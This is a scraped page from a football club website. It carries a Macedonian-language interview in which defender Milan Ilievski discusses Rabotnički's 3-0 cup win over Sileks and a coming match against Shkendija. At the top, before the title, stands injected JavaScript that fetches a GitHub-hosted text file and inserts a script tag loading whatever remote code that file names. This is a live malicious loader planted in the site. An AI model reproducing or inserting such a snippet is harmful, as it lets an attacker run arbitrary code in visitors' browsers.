;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ФК Работнички » Илиевски: Одлична предност во Купот, но и самодоверба пред дуелот со Шкендија
shopping-bag 0
Items : 0
Subtotal : 0 MKD
View Cart Check Out

Илиевски: Одлична предност во Купот, но и самодоверба пред дуелот со Шкендија

Работнички успеа да обезбеди предност од 3-0 над Силекс по првиот четвртфинален натпревар во Купот на Македонија, а пред реваншот што ќе следи во Кратово. Задоволни од квалитетната игра и убедливиот резултат, избраниците на Игор Ангеловски се полни со самодоверба и пред неделниот првенствен дуел со Шкендија. Искусниот дефанзивец Милан Илиевски прави ретроспектива на куп – мечот против кратовци одигран во Велес, но и го најавува следното првенствено искушение.

„Одигравме квалитетен натпревар во Велес против Силекс и го остваривме тоа што го посакувавме – победа без примен гол. Мислам дека и напаѓачите одлично ја завршија работата, затоа што предноста од 3-0 е и повеќе од солидна, иако секако дека следи и реванш во Кратово, па работата не е целосно завршена. Нема да се опуштиме, но мислам дека остварениот резултат ни дава право да сме многу блиску до пласманот меѓу четирите најдобри екипи во Купот на Македонија. Морам да кажам дека стадионот во Велес кој има вештачка трева ни понуди одлични услови за игра, посебно за овој период, кога знаеме какви се условите и пред се терените за игра во нашата земја“, вели Милан Илиевски.

По победата над Силекс, веќе в недела следи ново првенствено искушение против Шкендија на гости, најверојатно во Кичево.

„Веќе навикнавме оваа сезона на забрзан ритам на настапи и тоа не ни е преголем товар. Добро е што се консолидиравме од повредите и сега сме комплетни, па тренерот Ангеловски може да смета на целиот тим. Тоа значи многу, сите можат да го дадат својот максимум, ја вративме нашата позната агресивност во играта, а самодовербата ни е зголемена по триумфот од 3-0 над Силекс. Атмосферата во екипата е прекрасна, впрочем тоа е една од главните одлики на Работнички и со право можам да кажам дека сме подготвени за надигрување против Шкендија. Тоа е квалитетен тим, кој игра во константно добра форма оваа сезона, а и ние полека го враќаме оној наш изглед од европските настапи. Не очекува тежок и неизвесен дуел, а ние се надеваме на позитивен епилог“, истакнува Илиевски.

Leave a Reply